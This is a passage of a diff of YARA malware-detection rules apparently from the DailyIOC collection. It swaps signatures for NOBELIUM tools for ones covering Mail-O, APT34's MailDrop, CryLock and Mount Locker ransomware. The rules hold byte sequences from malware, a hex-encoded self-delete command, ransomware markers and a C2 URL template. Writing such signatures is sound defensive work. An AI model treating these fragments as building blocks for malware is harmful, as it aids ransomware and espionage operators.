8b 44 24 70 48 8b d0 48 8b c8 4c 8b f0 e8 64 24 00 00 4c 8d 45 90 49 8b d6 4d 2b c6 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 49 8b ce e8 b8 39 00 00 44 89 64 24 38 8d 43 04 89 44 24 30 44 8d 4b 08 48 8d 55 90 41 b8 04 00 00 00 49 8b cf 89 74 24 28 89 }
+		$seq3 = { 48 89 5c 24 18 55 56 57 48 83 ec 70 48 8b 05 9d fe 01 00 48 33 c4 48 89 44 24 60 33 c0 48 8b d9 8b fa 8d 48 20 c6 44 24 48 00 48 89 44 24 49 48 89 44 24 51 e8 d7 31 00 00 48 8d 15 44 c6 01 00 48 8b f0 33 c0 48 8d 4c 24 48 48 89 06 48 89 46 08 48 89 46 10 4c 8b c3 48 89 46 18 e8 3f 13 00 00 48 8d 4c 24 48 ff 15 ac 50 01 00 bd 02 00 00 00 0f b7 cf 89 44 24 3c 66 89 6c 24 38 ff 15 a5 2e 02 00 8d 55 ff 44 8d 45 04 8b cd 66 89 44 24 3a ff 15 01 32 02 00 48 8b f8 48 83 f8 ff 75 20 48 8d 15 e1 c5 01 00 48 8b ce e8 81 30 00 00 48 0b df 48 ff c3 80 3c 1e 00 75 f7 e9 c9 00 00 00 48 8d 54 24 38 41 b8 10 00 00 00 48 8b c8 ff 15 f4 31 02 00 83 f8 ff 75 6b 48 8d 15 a8 c5 01 00 48 8b ce e8 48 30 00 00 48 83 cb }
+		$seq4 = { 40 55 48 8d ac 24 e0 fb ff ff 48 81 ec 20 05 00 00 48 8b 05 b8 fc 01 00 48 33 c4 48 89 85 10 04 00 00 48 8d 8d f1 00 00 00 33 d2 41 b8 03 01 00 00 c6 85 f0 00 00 00 00 e8 93 59 00 00 48 8d 8d 01 02 00 00 33 d2 41 b8 07 02 00 00 c6 85 00 02 00 00 00 e8 78 59 00 00 48 8d 4d e1 33 d2 41 b8 03 01 00 00 c6 45 e0 00 e8 63 59 00 00 48 8d 95 f0 00 00 00 41 b8 f4 01 00 00 33 c9 ff 15 2e 30 02 00 85 c0 0f 84 5e 01 00 00 48 8d 55 e0 b9 f4 01 00 00 48 89 9c 24 30 05 00 00 48 89 bc 24 38 05 00 00 ff 15 17 30 02 00 4c 8d 05 20 15 02 00 48 8d 4d e0 ba 04 01 00 00 e8 5a 37 00 00 48 8d 45 e0 4c 8d 0d f7 14 02 00 48 89 44 24 28 48 8d 85 f0 00 00 00 4c 8d 85 f0 00 00 00 48 8d 15 dd c3 01 00 48 8d 8d 00 02 00 00 48 89 44 24 20 e8 fc 10 00 00 33 ff 48 8d 4d e0 48 89 7c 24 30 44 8d 47 03 45 33 c9 ba 00 00 00 40 c7 44 24 28 80 00 00 00 c7 44 24 20 02 00 00 00 ff 15 6f 2f 02 00 48 8b d8 }
+		$seq5 = { 48 89 5c 24 10 48 89 74 24 18 48 89 7c 24 20 55 48 8d ac 24 70 f2 ff ff 48 81 ec 90 0e 00 00 48 8b 05 da ed 01 00 48 33 c4 48 89 85 80 0d 00 00 48 8b f1 48 8d 8d 81 05 00 00 33 d2 41 b8 ff 07 00 00 c6 85 80 05 00 00 00 e8 b2 4a 00 00 48 8d 4d 71 33 d2 41 b8 03 01 00 00 c6 45 70 00 e8 9d 4a 00 00 33 c0 c6 44 24 50 00 39 05 f4 1c 02 00 89 44 24 51 75 0b e8 b5 dd ff ff 89 05 e3 1c 02 00 48 8d 4d 70 e8 c6 e3 ff ff 8b 05 e8 b5 01 00 48 8d 8d 81 01 00 00 89 44 24 50 0f b6 05 da b5 01 00 33 d2 41 b8 ff 03 00 00 c6 85 80 01 00 00 00 88 44 24 54 e8 46 4a 00 00 48 8d 15 3f b6 01 00 48 8d 8d 80 01 00 00 e8 b3 1f 00 00 48 8d 4d 90 33 d2 0f 10 05 b6 b6 01 00 0f 10 0d bf b6 01 00 41 b8 d4 00 00 00 0f 29 44 24 60 0f 29 4c 24 70 0f 10 05 b8 b6 01 00 0f 29 45 80 e8 ff 49 00 00 48 83 cb ff 48 8b c3 0f 1f 84 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 60KB and 4 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Envyscout_May_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Mailo_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect EnvyScout downloader"
+		description = "Detect the Mach-O malware"
 		author = "Arkbird_SOLG"
-		id = "645f60d1-7c95-515c-a88e-d8528cf8b644"
-		date = "2021-05-28"
-		modified = "2021-06-02"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_EnvyScout_May_2021_1.yara#L1-L20"
+		id = "4c975200-fce4-5a2a-b565-6d397c4e0b1c"
+		date = "2021-06-09"
+		modified = "2021-06-21"
+		reference = "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/MAIL-O/MAL_MailO_Jun_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "7ce4fd18c88f7ea7486c51fc0b673d178bd26ecc2f4a39ec9c5a4a71aaa0daa1"
+		logic_hash = "165c5fd90039c14ef1fa1e80bb7f14761e991b09560c5f1da2ddf9a0eadee623"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "279d5ef8f80aba530aaac8afd049fa171704fc703d9cfe337b56639732e8ce11"
-		hash2 = "9059c5b46dce8595fcc46e63e4ffbceeed883b7b1c9a2313f7208a7f26a0c186"
+		hash1 = "3a77f108e32b34e184f9ade66292cd73abbd297b4829ba63a973a400cc7f3f9f"
+		hash2 = "603881f4c80e9910ab22f39717e8b296910bff08cd0f25f78d5bff1ae0dce5d7"
 		tlp = "White"
-		adversary = "NOBELIUM"
+		adversary = "TA428"
 
 	strings:
-		$s1 = "==typeof window&&window.window===window?window:" fullword ascii
-		$s2 = "==typeof self&&self.self===self?self:" fullword ascii
-		$s3 = "0===t?t={autoBom:!1}:" fullword ascii
-		$s4 = "_global.saveAs=saveAs.saveAs=saveAs" fullword ascii
-		$s5 = "navigator.userAgent" fullword ascii
-		$s6 = { 6e 65 77 20 42 6c 6f 62 28 5b [1-12] 5d 2c 20 7b 74 79 70 65 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 29 3b 73 61 76 65 41 73 28 }
+		$seq1 = { 48 8b ce e8 9e 0c f9 ff 48 8b 5c 24 20 48 8b 4c 24 28 49 8b d7 41 ff c5 ff 15 20 72 08 00 4c 8b f8 48 85 c0 0f 85 4c ff ff ff 48 8b b4 24 88 00 00 00 48 8b 4c 24 28 33 d2 ff 15 f7 71 08 00 4c 8b ac 24 90 00 00 00 4d 85 e4 0f 84 7f 01 00 00 48 8b ac 24 80 00 00 00 4d 8b c4 48 8b cd 48 8b d6 ff 53 48 49 8b cc 8b f0 e8 88 2c f8 ff 4c 8b bc 24 98 00 00 00 85 c0 0f 8e fb 00 00 00 0f 1f 84 00 00 00 00 00 41 8b d6 49 8b cc e8 95 2e f8 ff 48 8b f8 44 3b f6 75 75 49 89 07 e9 c4 00 00 00 48 8b 5c 24 20 45 33 c0 48 8b ce 41 8d 50 01 e8 a1 4b f9 ff 85 c0 0f 84 43 ff ff ff 49 8b d7 48 8b cb e8 ce e7 ff ff 48 8b d8 48 85 c0 0f 84 2c ff ff ff 49 8b cf ff 15 71 71 08 00 8b 15 ff e0 12 00 4c 8b c3 48 8b ce 48 89 03 e8 45 0c f9 ff 4d 85 e4 75 08 e8 2b 2b f8 ff 4c 8b e0 48 8b d6 49 8b cc e8 cd 2c f8 ff e9 fa fe ff ff 8b 15 ce e0 12 00 48 8b cf e8 ca 0b f9 ff 48 8b d8 48 85 c0 74 39 48 8b 48 10 ff 15 d8 70 08 00 48 8b 4b 08 33 d2 ff 15 d4 70 08 00 48 8b 0b 48 85 c9 74 06 ff 15 0e 71 08 00 41 b8 3a 06 00 00 48 8d 15 b1 71 0d 00 }
+		$seq2 = { 4c 8d 84 24 d0 00 00 00 4c 89 b4 24 90 01 00 00 48 8d 15 d8 a2 17 00 48 8b cd e8 50 e1 ff ff 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 0c 83 7c 24 44 01 75 05 41 b6 01 eb 03 45 32 f6 48 8b 5c 24 28 45 84 f6 74 14 f6 85 74 0e 00 00 08 74 0b 48 8b d3 48 8b ce e8 15 03 00 00 48 8b cb e8 5d f4 ff ff 45 84 f6 74 17 f7 85 74 0e 00 00 00 10 00 00 74 0b 48 8b d3 48 8b cd e8 d1 01 00 00 48 83 bd 38 07 00 00 00 74 33 b2 01 48 8b cd e8 1d f1 fe ff 48 8b 8d 40 07 00 00 45 33 c0 48 8b d3 ff 95 38 07 00 00 33 d2 48 8b cd 44 8b f0 e8 fd f0 fe ff 41 83 fe 02 75 51 41 b4 01 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 5a 48 8d 4c 24 50 e8 ac 81 02 00 44 8b 44 24 40 44 8b c8 48 8b d3 48 8b ce e8 d9 f8 ff ff 8b f8 85 c0 74 37 48 8b d3 48 8b ce e8 68 eb ff ff b8 07 00 00 00 83 ff 01 0f 44 f8 }
+		$seq3 = { 48 8b d0 48 8d 4d 80 41 ff d4 48 8b cb ff 15 f2 fa 1e 00 48 8d 95 e0 00 00 00 48 8d 4d 80 41 ff d7 f6 47 3c 02 48 8d 8d 90 00 00 00 48 0f 44 4c 24 50 e8 f6 04 00 00 4c 8b f0 48 85 c0 0f 84 05 fe ff ff 48 8b 47 28 49 8b d6 4c 8b 0f 4c 8b 47 10 48 85 c0 74 53 48 8d 8d e0 00 00 00 48 89 4c 24 40 48 8d 0d 94 90 15 00 48 89 44 24 38 8b 47 38 89 44 24 30 48 8b 47 08 48 89 44 24 28 48 8b 44 24 58 48 89 44 24 20 e8 e0 42 fc ff 48 8b 4f 28 48 8d 15 b9 8e 15 00 48 8b d8 e8 3d 7a fd ff 85 c0 74 2a ff 47 38 eb 25 48 8d 85 e0 00 00 00 48 89 44 24 28 48 8d 0d a1 90 15 00 48 8b 44 24 58 48 89 44 24 20 e8 a2 42 fc ff 48 8b d8 49 8b ce ff 15 2e fa 1e 00 48 85 db 0f 84 68 fd ff ff 4c 8b 47 20 4d 85 c0 74 27 48 8b d3 48 8d 0d aa 90 15 00 e8 75 42 fc ff 48 8b cb 4c 8b f0 ff 15 01 fa 1e 00 4d 85 f6 0f 84 3b fd ff ff 49 8b de 4c 8b 47 30 4d 85 c0 74 27 48 8b d3 48 8d 0d 8a 90 15 00 e8 45 42 fc ff 48 8b cb 4c 8b f0 ff 15 d1 f9 1e 00 4d 85 f6 0f 84 0b fd ff ff 49 8b de f6 47 3c 02 74 27 48 8b d3 48 8d 0d 75 90 15 00 e8 18 42 fc ff 48 8b cb 48 8b f8 ff 15 a4 f9 1e 00 48 }
+		$seq4 = { 48 81 ec 08 03 00 00 48 8b 05 e2 61 23 00 48 33 c4 48 89 84 24 f0 02 00 00 33 d2 48 8d 8c 24 e0 00 00 00 41 b8 08 02 00 00 e8 c2 f5 16 00 41 b8 04 01 00 00 48 8d 94 24 e0 00 00 00 48 8d 0d c5 94 21 00 ff 15 07 ee 18 00 48 8d 8c 24 e0 00 00 00 ff 15 d1 ef 18 00 85 c0 74 63 33 d2 48 8d 4c 24 70 44 8d 42 68 e8 85 f5 16 00 b8 05 00 00 00 c7 44 24 70 68 00 00 00 66 89 84 24 b0 00 00 00 48 8d 8c 24 e0 00 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 45 33 c0 48 8d 44 24 70 33 d2 48 89 44 24 40 33 c0 48 89 44 24 38 48 89 44 24 30 89 44 24 28 89 44 24 20 ff 15 52 ed 18 00 48 8b 8c 24 f0 02 00 00 48 33 cc e8 c2 cf 16 00 48 }
+		$seq5 = { 48 89 74 24 48 48 8d 0d 99 5e 18 00 4c 89 74 24 50 48 8b d5 4c 89 7c 24 58 e8 5f 13 17 00 4c 8d b7 0c 08 00 00 49 63 06 85 c0 0f 84 b0 00 00 00 48 8b c8 48 c1 e1 03 ff 15 a8 5f 22 00 48 8b f0 48 85 c0 0f 84 04 01 00 00 45 33 ff ba 00 01 00 00 41 8b df 90 48 8b 07 48 85 c0 74 16 4c 39 78 28 74 08 8b cb ff c3 48 89 04 ce 48 8b 00 48 85 c0 75 ea 48 83 c7 08 48 83 ea 01 75 d8 49 63 16 4c 8d 0d ce 01 00 00 41 b8 08 00 00 00 48 8b ce e8 c0 14 17 00 85 db 74 3e 4c 8b f6 49 8b 0e e8 c1 03 00 00 48 8b f8 48 8b cd 48 85 c0 0f 84 85 00 00 00 4c 8b c0 48 8d 15 58 5a 18 00 e8 33 a8 ff ff 48 8b cf ff 15 22 5f 22 00 41 ff c7 49 83 c6 08 44 }
 
 	condition:
-		filesize > 100KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and 4 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Nativezone_May_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT_34_Maildrop_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect NativeZone malware"
+		description = "Detect MailDrop malware used by APT34"
 		author = "Arkbird_SOLG"
-		id = "5b858a8d-6e6a-5712-a83a-229bed1c7872"
-		date = "2021-05-28"
-		modified = "2021-06-05"
+		id = "a17c4e0b-9bbb-594d-8551-5c146e6a601e"
+		date = "2021-04-03"
+		modified = "2021-04-09"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_NativeZone_May_2021_1.yara#L1-L17"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-03/APT34/APT_APT_34_MailDrop_Mar_2021_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "9281784100e922fe3ef64e7c112276ffa5f8691ab4f24f1b68fbb0495e449bd3"
+		logic_hash = "f55192044bf8e190dfdc18aeaac543a5022643ea242e75ff2492939ae6e1814c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
-		hash2 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
+		hash1 = "d6b876d72dba94fc0bacbe1cb45aba493e4b71572a7713a1a0ae844609a72504"
+		hash2 = "ebae23be2e24139245cc32ceda4b05c77ba393442482109cc69a6cecc6ad1393"
+
+	strings:
+		$EWSInitCom = { 7e ?? 00 00 04 28 ?? 00 00 06 ?? 4f [0-3] 02 7b ?? 00 00 04 28 ?? 00 00 06 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 02 7b ?? 00 00 04 28 ?? 00 00 06 72 ?? 00 00 70 28 ?? 00 00 0a 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 7e ?? 00 00 04 72 ?? 00 00 70 28 ?? 00 00 06 7e 06 00 00 04 28 ?? 00 00 06 [2-4] 00 00 [3-4] 00 00 [3] 00 00 [3] 00 00 [3] 00 00 }
+		$EWSCom = { 13 30 ?? 00 ?? 00 00 00 00 00 00 00 02 28 ?? 00 00 ?? 02 03 05 0e 04 0e 05 0e 06 [0-4] 73 ?? 00 00 06 7d ?? 00 00 04 04 [2-6] 00 00 ?? 02 ?? 7d ?? 00 00 04 [0-2] 02 ?? 7d ?? 00 00 04 [2-4] 00 00 [0-18] 04 02 28 ?? 00 00 06 2a }
+		$EWSDecrypt = { 13 30 03 00 27 00 00 00 ?? 00 00 11 0f 00 20 00 01 00 00 16 28 ?? 00 00 06 28 ?? 00 00 06 0a 0f 00 1f 10 16 28 ?? 00 00 06 0b 02 06 07 28 ?? 00 00 06 2a }
+		$EWSRandomData = { 1b 30 ?? 00 ?? 00 00 00 ?? 00 00 11 02 19 28 ?? 00 00 0a 0a 16 0b ?? 35 [0-3] 06 16 6a 16 6f ?? 00 00 0a 26 06 6f ?? 00 00 0a d4 8d ?? 00 00 01 0c 7e ?? 00 00 04 08 6f ?? 00 00 0a 06 08 16 06 6f ?? 00 00 0a b7 6f ?? 00 00 0a 07 17 d6 0b 07 1f 32 32 c6 [5-11] 06 6f ?? 00 00 0a dc 2a [0-1] 01 10 00 00 02 00 08 00 }
+		$s1 = "HMicrosoft Office/15.0 (Windows NT {0}; Microsoft Outlook 15.0.4675; Pro)" fullword ascii
+		$s2 = "https://{0}/ews/exchange.asmx" fullword wide
+		$s3 = "Send_Log" fullword ascii
+		$s4 = "CheckEWSConnection" fullword ascii
+		$s5 = "Done:D" fullword wide
+		$s6 = "ExecAllCmds" fullword ascii
+		$s7 = "ExchangeUri" fullword ascii
+		$s8 = "get_cmdSubject" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 2 of ( $EWS* ) and 5 of ( $s* )
+}
+rule ARKBIRD_SOLG_RAN_Crylock_July_2021_1 : FILE
+{
+	meta:
+		description = "Detect CryLock ransomware (ex-Cryakl)"
+		author = "Arkbird_SOLG"
+		id = "350bd622-f4b5-5837-a239-dc506b100aef"
+		date = "2021-07-17"
+		modified = "2021-07-17"
+		reference = "https://twitter.com/BushidoToken/status/1415958829318217730"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-16/Crylock/RAN_Crylock_July_2021_1.yara#L1-L23"
+		license_url = "N/A"
+		logic_hash = "4f5046a64e7491085a55d8d1f2b5b056dc0aa89fcdea47652ecb7db680de2f59"
+		score = 75
+		quality = 65
+		tags = "FILE"
+		hash1 = "a962501ea4cd363dd588c948ff8b0ab24aa4132ff58f4a7806af06efa3b791ef"
+		hash2 = "1c2975dd464d014502a46ba6383943c7de4635e3664011653217dc424d53f8fe"
+		hash3 = "e001f6a5b2d4d2659b010fb5825eb4383e8f415861a244329bc70cfcd18da507"
 		tlp = "White"
-		adversary = "NOBELIUM"
+		adversary = "RAAS"
 
 	strings:
-		$s1 = { 8b ff 55 8b ec 81 ec 1c 01 00 00 a1 00 ?? 01 10 33 c5 89 45 fc 8b 4d 0c 53 8b 5d 14 56 8b 75 08 89 b5 fc fe ff ff 89 9d f8 fe ff ff 57 8b 7d 10 89 bd 00 ff ff ff 85 f6 75 25 85 c9 74 21 e8 [2] ff ff c7 00 16 00 00 00 e8 [2] ff ff 8b 4d fc 5f 5e 33 cd 5b e8 [2] ff ff 8b e5 5d c3 85 ff 74 db 85 db 74 d7 c7 85 f4 fe ff ff 00 00 00 00 83 f9 02 72 d8 49 0f af cf 03 ce 89 8d 04 ff ff ff 8b c1 33 d2 2b c6 f7 f7 8d 78 01 83 ff 08 0f 87 dc 00 00 00 8b bd 00 ff ff ff 3b ce 0f 86 a1 00 00 00 8d 14 37 89 95 ec fe ff ff 8d 49 00 8b c6 8b f2 89 85 08 ff ff ff 3b f1 77 31 8b ff 50 56 8b cb ff 15 [2] ?? 10 ff d3 83 c4 08 85 c0 7e 0a 8b c6 89 85 08 ff ff ff eb 06 8b 85 08 ff ff ff 8b 8d 04 ff ff ff 03 f7 3b f1 76 d1 8b d1 3b c1 74 34 2b c1 8b df 89 85 08 ff ff ff 90 8a 0c 10 8d 52 01 8b b5 08 ff ff ff 8a 42 ff 88 44 16 ff 8b c6 88 4a ff 83 eb 01 75 e3 8b 9d f8 fe ff ff 8b 8d 04 ff ff ff 8b b5 fc fe ff ff 2b cf 8b 95 ec fe ff ff 89 8d 04 ff ff ff 3b }
-		$s2 = { 8b b5 00 ff ff ff 8b cb 8b 85 fc fe ff ff d1 ef 0f af fe 03 f8 57 50 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 57 ff b5 fc fe ff ff e8 1b fe ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb ff b5 fc fe ff ff ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 15 56 ff b5 04 ff ff ff ff b5 fc fe ff ff e8 e9 fd ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb 57 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 ff b5 04 ff ff ff 57 e8 c1 fd ff ff 83 c4 0c 8b 85 04 ff ff ff 8b d8 8b b5 fc fe ff ff 8b 95 00 ff ff ff 89 85 08 ff ff ff 8d 64 24 00 3b fe 76 37 03 f2 89 b5 f0 fe ff ff 3b f7 73 25 8b 8d f8 fe ff ff 57 56 ff 15 [3] 10 ff 95 f8 fe ff ff 8b 95 00 ff ff ff 83 c4 08 85 c0 7e d3 3b fe 77 3d 8b 85 04 ff ff ff 8b 9d f8 fe ff ff 03 f2 3b f0 77 1f 57 56 8b cb ff 15 [3] 10 ff d3 8b 95 00 ff ff ff 83 c4 08 85 c0 8b 85 04 ff ff ff 7e db 8b 9d 08 ff ff ff 89 b5 f0 fe ff ff 8b b5 f8 fe ff ff eb 06 8d 9b 00 00 00 00 8b 95 00 ff ff ff 8b c3 2b da 89 85 08 ff ff ff 3b df 76 1f 57 53 8b ce ff 15 [3] 10 ff d6 83 c4 08 85 c0 7f d9 8b 95 00 ff ff ff 8b 85 08 ff ff ff 8b b5 f0 fe ff ff 89 9d 08 ff ff ff }
-		$s3 = { 8b 45 f4 89 7d f8 8d 04 86 8b c8 89 45 e8 8b c7 89 4d f4 3b 45 dc 74 5b 8b d6 2b d7 89 55 e4 8b 00 8b d0 89 45 ec 8d 42 01 89 45 f0 8a 02 42 84 c0 75 f9 2b 55 f0 8d 42 01 50 ff 75 ec 89 45 f0 8b 45 e8 2b c1 03 45 fc 50 51 e8 [2] 00 00 83 c4 10 85 c0 75 72 8b 45 f8 8b 55 e4 8b 4d f4 89 0c 02 83 c0 04 03 4d f0 89 4d f4 89 45 f8 3b 45 dc 75 ac 8b 45 0c 89 5d f8 89 30 8b f3 53 e8 [2] ff ff 59 8b 45 dc 8b d7 2b c2 89 55 e4 83 c0 03 c1 e8 02 39 55 dc 1b c9 f7 d1 23 c8 89 4d e8 74 18 8b f1 ff 37 e8 [2] ff ff 43 8d 7f 04 59 3b }
+		$s1 = { 2f 63 20 22 70 69 6e 67 20 30 2e 30 2e 30 2e 30 26 64 65 6c 20 22 }
+		$s2 = { 7b 45 4e 43 52 59 50 54 53 54 41 52 54 7d 7b }
+		$s3 = { 7b 45 4e 43 52 59 50 54 45 4e 44 45 44 7d }
+		$s4 = { 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 45 58 54 45 4e 41 54 49 4f 4e 53 5c 5c 5c 00 ff ff ff ff 17 00 00 00 2f 2f 2f 45 4e 44 20 43 4f 4d 4d 41 4e 44 53 20 4c 49 53 54 5c 5c 5c 00 ff ff ff ff 1d 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 4b 49 4c 4c 20 4c 49 53 54 5c 5c 5c 00 00 00 ff ff ff ff 1c 00 00 00 2f 2f 2f 45 4e 44 20 53 45 52 56 49 43 45 53 20 53 54 4f 50 20 4c 49 53 54 5c 5c 5c 00 00 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 57 48 49 54 45 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 49 4c 45 53 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 20 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 4f 4c 44 45 52 53 20 4c 49 53 54 5c 5c 5c }
+		$s5 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 }
+		$s6 = { 3c 25 55 4e 44 45 43 52 59 50 54 5f 44 41 54 45 54 49 4d 45 25 3e }
+		$s7 = { 25 00 73 00 20 00 28 00 25 00 73 00 2c 00 20 00 6c 00 69 00 6e 00 65 00 20 00 25 00 64 00 29 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Enc_Payload_May_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Mount_Locker_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect encrypted payload, must be with others APT29 rules maybe give lot fake postives due to the pdf header"
+		description = "Detect Mount Locker ransomware (November 2020 variant)"
 		author = "Arkbird_SOLG"
-		id = "34da1d06-7892-59ec-8b11-c3278a7f2e34"
-		date = "2021-05-28"
-		modified = "2021-06-02"
+		id = "20fde6f4-ef7d-57c4-8cc2-a6ea810c2b0c"
+		date = "2020-11-20"
+		modified = "2020-11-22"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_Enc_payload_May_2021_1.yara#L1-L17"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Mount Locker/Ran_Mount_Locker_Nov_2020_1.yar#L1-L26"
 		license_url = "N/A"
-		logic_hash = "484d9947d8acd32126cdc3e3f671cd3b3b048bbdb608d5573f6fcc7e4ddf13f8"
-		score = 50
+		logic_hash = "028e89e9c0c46ac5c36fee5cbfba068b4c6c1f53aa224e454ebd358f2c6ae9a9"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "23e20d630a8fd12600c2811d8f179f0e408dcb3e82600456db74cbf93a66e70f"
-		hash2 = "656384c4e5f9fe435d51edf910e7ba28b5c6d183587cf3e8f75fb2d798a01eeb"
-		level = "Experimental"
-		tlp = "White"
-		adversary = "NOBELIUM"
+		hash1 = "e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037"
+		hash2 = "226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2"
 
 	strings:
-		$s1 = { 25 50 44 46 2d 31 2e 33 0a 25 06 8b c4 1c c5 86 66 f3 dc 75 f9 3b dd 8c 44 e3 d3 a4 74 9d 94 4e 2e 0f d9 01 a6 f2 88 6a a8 0b 16 1b 1a fc 60 3f 72 7a 1b c1 a7 bb 2f 19 31 6d 6f 79 db 20 f6 c7 fa e7 eb b9 88 77 de 1f a1 92 d7 ea 68 a9 b7 89 17 92 e8 b2 bb a5 58 56 b4 30 60 f8 28 0c 54 7b 2b 68 ba 7e 01 01 6d ad 2e 6d 72 67 1e b0 a8 ea 42 82 bd 14 9a 86 f0 0d 9a 8b 92 76 b3 b3 7d ef 69 24 2c 9f c2 ca e9 c9 b3 }
-		$s2 = { 25 25 45 4f 46 0a }
+		$s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword wide
+		$s2 = "VBA6.DLL" fullword ascii
+		$s3 = "MSComDlg.CommonDialog" fullword ascii
+		$s4 = "DllFunctionCall" fullword ascii
+		$s5 = { 00 2a 00 5c 00 41 00 43 00 3a 00 5c [35-160] 00 2e 00 76 00 62 00 70 }
+		$s6 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\COMCTL32.oca" fullword wide
+		$s7 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\MSFLXGRD.oca" fullword ascii
+		$s8 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
+		$s9 = "SFLXGRD.OCX" fullword ascii
+		$s10 = "COMDLG32.OCX" fullword ascii
+		$s11 = "COMCTL32.OCX" fullword ascii
+		$seq1 = { 42 00 24 00 40 00 43 00 67 00 2f 00 44 00 08 00 4a 00 51 00 77 00 54 00 76 00 25 00 55 00 48 00 00 00 00 00 5d 00 4c 00 09 00 53 00 3e 00 73 00 62 00 52 00 50 00 0b 00 61 00 01 00 61 01 3a 00 03 00 57 00 4f 00 75 00 54 00 71 00 22 00 53 00 37 00 00 00 30 00 1d 00 46 00 5a 00 5c 00 48 00 78 00 63 00 02 00 1d 00 23 00 3b 00 28 00 55 00 73 00 28 00 61 00 3b 00 00 00 00 00 44 00 4e 00 4a 00 4d 00 61 00 40 00 59 00 2b 00 38 00 02 01 04 01 54 00 08 00 52 00 56 00 1d 00 42 00 3e 00 00 00 00 00 35 00 70 00 3b 00 37 00 6f 00 26 00 26 00 40 00 64 00 02 00 51 00 3c 00 41 00 16 00 3e 00 00 00 47 00 58 00 33 00 89 00 54 00 2d 00 29 00 50 00 04 00 59 00 5d 00 4f 00 1b 00 36 00 30 00 83 00 41 00 00 00 2a 00 54 00 47 00 86 00 56 00 19 00 24 00 4e 00 3a 00 45 00 51 00 4d 00 1e 00 3b 00 2b 00 81 00 35 00 00 00 3a 00 65 00 57 00 03 00 2d 00 62 00 53 }
